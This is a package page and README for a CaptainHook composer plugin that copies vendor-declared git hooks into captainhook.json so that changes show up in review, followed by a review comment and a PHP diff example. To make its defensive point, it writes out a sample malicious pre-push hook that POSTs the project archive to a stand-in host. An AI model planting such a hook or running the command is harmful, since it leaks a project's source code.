boesing / captainhook-vendor-resolver
CaptainHook extension which resolves vendor packages after installation in order to merge captainhook.json with the hooks those vendor packages provide
Requires
- php: ^7.3
- composer-plugin-api: ^1.1
- captainhook/captainhook: ^5.0
- webmozart/assert: ^1.5
Requires (Dev)
- composer/composer: ^1.9
- jakub-onderka/php-parallel-lint: ^1.0
- laminas/laminas-coding-standard: ^2.0
- phpstan/extension-installer: ^1.0
- phpstan/phpstan: ^0.11.19
- phpstan/phpstan-webmozart-assert: ^0.11.3
- phpunit/phpunit: ^8.4
This package is auto-updated.
Last update: 2021-08-23 10:47:06 UTC
README
This composer plugin adds package scanning for captainhook/captainhook hooks. Every time composer require, composer install or composer remove is invoked, the plugin inspects the composer.json of each package being installed or removed and adds its hooks to, or removes them from, captainhook.json.
Note: since captainhook v5.0 you can point CaptainHook at a dedicated captainhook.json with --configuration. If you use that argument, tell the plugin where that file lives through a captainhook-vendor-resolver.json placed next to your composer.json:
{
    "captainhook": "relativeOrAbsolutePath/to/your/captainhook.json"
}
How does this differ from the existing "includes" feature?
Because this package only parses composer.json and inserts or removes the hooks itself, your project gets a proper diff whenever a vendor hook changes. There are no hidden hook files in the project.
Your project's captainhook.json always contains every hook that is going to run, which can be reviewed easily, for example in a pull request.
Example using the vendor resolver
captainhook.json
{
    "commit-msg": {
        "enabled": false,
        "actions": []
    },
    "pre-push": {
        "enabled": true,
        "actions": [
            {
                "exec": "echo hey there"
            }
        ]
    },
    "prepare-commit-msg": {
        "enabled": false,
        "actions": []
    },
    "post-commit": {
        "enabled": false,
        "actions": []
    },
    "post-merge": {
        "enabled": false,
        "actions": []
    },
    "post-checkout": {
        "enabled": false,
        "actions": []
    },
    "pre-commit": {
        "enabled": false,
        "actions": []
    }
}
Current version of the vendor package...
vendor/package/composer.json v1.0.0
{
    "extra": {
        "captainhook-hooks": {
            "pre-push": {
                "actions": [
                    {
                        "exec": "echo hey there"
                    }
                ]
            }
        }
    }
}
After updating the vendor package...
vendor/package/composer.json v1.0.1
{
    "extra": {
        "captainhook-hooks": {
            "pre-push": {
                "actions": [
                    {
                        "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
                    }
                ]
            }
        }
    }
}
diff captainhook.json
10c10
< "exec": "echo hey there"
---
> "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
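Review bot: the `10c10` hunk replaces the harmless `echo hey there` with a command that archives the working tree, POSTs it to https://example.com and then removes the archive; a pre-push action from a vendor package that contacts an external host should be rejected in review and the package kept at v1.0.0 until the maintainer explains the change. As written the archive step uses `tar -xzf` (extract) where creating the archive would need `-czf`, so the upload would not succeed as written, but what the reviewer has to judge is the intent of the line, not whether it happens to work.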
Example using includes (security impact)
captainhook.json
{
    "config": {
        "includes": [
            "vendor/package/captainhook.hooks.json"
        ]
    }
}
Current version of the vendor package...
vendor/package/captainhook.hooks.json v1.0.0
{
    "pre-push": {
        "actions": [
            {
                "exec": "echo hey there"
            }
        ]
    }
}
After updating the vendor package...
vendor/package/captainhook.hooks.json v1.0.1
{
    "pre-push": {
        "actions": [
            {
                "exec": "tar -xzf project.tar.gz . && curl -X POST --data @project.tar.gz https://example.com & rm project.tar.gz"
            }
        ]
    }
}
diff captainhook.json (no output: the project's captainhook.json did not change, only the included vendor/package/captainhook.hooks.json did)
If you do not re-check the vendor package for changes to the hook file you include, your next git push will upload the whole project to the attacker's site, and nothing in your own repository will have shown you that the hook changed.
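Both scenarios above, as an added PHP example that is not code from boesing/captainhook-vendor-resolver: a minimal resolver in the plugin's spirit that reads `extra.captainhook-hooks` from a package's composer.json, copies the actions into the project's captainhook.json, and computes the per-hook diff a reviewer would see. The function names, the merge and removal rules (exact-match dedupe, removal of whatever the previous version declared before re-adding), the inline sample configs and the shortened exfiltration command are constructed assumptions that mirror the README's two scenarios, not the plugin's actual implementation.

```php
<?php
declare(strict_types=1);

// Added example, not the plugin's own code. Sample data is constructed inline
// so the script runs offline without touching the filesystem.

/** Hooks a package declares in its composer.json, or [] if it declares none. */
function vendorHooks(array $composerJson): array
{
    $hooks = $composerJson['extra']['captainhook-hooks'] ?? [];
    return is_array($hooks) ? $hooks : [];
}

/** Copy every declared action into the project config, skipping exact duplicates. */
function addVendorHooks(array $config, array $hooks): array
{
    foreach ($hooks as $hook => $definition) {
        if (!isset($config[$hook])) {
            $config[$hook] = ['enabled' => false, 'actions' => []];
        }
        foreach ($definition['actions'] ?? [] as $action) {
            if (!in_array($action, $config[$hook]['actions'], true)) {
                $config[$hook]['actions'][] = $action;
            }
        }
    }
    return $config;
}

/** Drop the actions a package declared: used on composer remove, and before re-adding on update. */
function removeVendorHooks(array $config, array $hooks): array
{
    foreach ($hooks as $hook => $definition) {
        if (!isset($config[$hook])) {
            continue;
        }
        $declared = $definition['actions'] ?? [];
        $config[$hook]['actions'] = array_values(array_filter(
            $config[$hook]['actions'],
            static function (array $action) use ($declared): bool {
                return !in_array($action, $declared, true);
            }
        ));
    }
    return $config;
}

/** Per hook, the actions that appeared or disappeared between two configs: the review surface. */
function actionDiff(array $before, array $after): array
{
    $diff = [];
    foreach (array_unique(array_merge(array_keys($before), array_keys($after))) as $hook) {
        $old = array_map('json_encode', $before[$hook]['actions'] ?? []);
        $new = array_map('json_encode', $after[$hook]['actions'] ?? []);
        $removed = array_values(array_diff($old, $new));
        $added = array_values(array_diff($new, $old));
        if ($removed !== [] || $added !== []) {
            $diff[$hook] = ['removed' => $removed, 'added' => $added];
        }
    }
    return $diff;
}

$json = JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES;

// Constructed sample: vendor/package composer.json at two versions, as in the README
// (the v1.0.1 command is a shortened stand-in for the README's exfiltration example).
$v100 = ['name' => 'vendor/package', 'version' => '1.0.0', 'extra' => ['captainhook-hooks' => [
    'pre-push' => ['actions' => [['exec' => 'echo hey there']]],
]]];
$v101 = ['name' => 'vendor/package', 'version' => '1.0.1', 'extra' => ['captainhook-hooks' => [
    'pre-push' => ['actions' => [['exec' => 'curl -X POST --data @project.tar.gz https://example.com']]],
]]];

// Scenario 1, vendor resolver: the project file carries the actions themselves,
// so the update shows up as a diff of captainhook.json.
$project   = ['pre-push' => ['enabled' => true, 'actions' => []]];
$installed = addVendorHooks($project, vendorHooks($v100));                                          // composer require
$updated   = addVendorHooks(removeVendorHooks($installed, vendorHooks($v100)), vendorHooks($v101)); // composer update
echo "resolver: diff of captainhook.json\n", json_encode(actionDiff($installed, $updated), $json), "\n";

// Scenario 2, includes: the project file only references the vendor file, so its own diff
// is empty even though the included file now carries the new action.
$viaIncludes = ['config' => ['includes' => ['vendor/package/captainhook.hooks.json']]];
echo "includes: diff of captainhook.json\n", json_encode(actionDiff($viaIncludes, $viaIncludes), $json), "\n";
echo "includes: diff of the vendor hook file\n", json_encode(actionDiff(vendorHooks($v100), vendorHooks($v101)), $json), "\n";
```

Run with `php resolver-example.php` (PHP 7.3 or later, matching the package's requirement). The resolver scenario prints a `pre-push` entry with the `echo` action removed and the `curl` action added, which is the change a pull request reviewer would see; the includes scenario prints `[]` for the project file, and the only non-empty diff is on the vendor file that nobody in the project is looking at.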